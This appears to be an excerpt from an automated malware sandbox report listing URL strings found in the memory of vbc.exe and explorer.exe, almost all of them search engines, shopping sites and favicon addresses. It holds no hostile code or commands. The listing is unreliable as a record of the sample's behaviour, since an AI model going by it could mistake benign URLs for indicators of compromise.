          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2140747061.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2135914914.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2140747061.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2135914914.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2141535584.0000000002160000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2145283595.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2155249221.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: vbc.exe, 00000004.00000002.2141535584.0000000002160000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2145283595.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
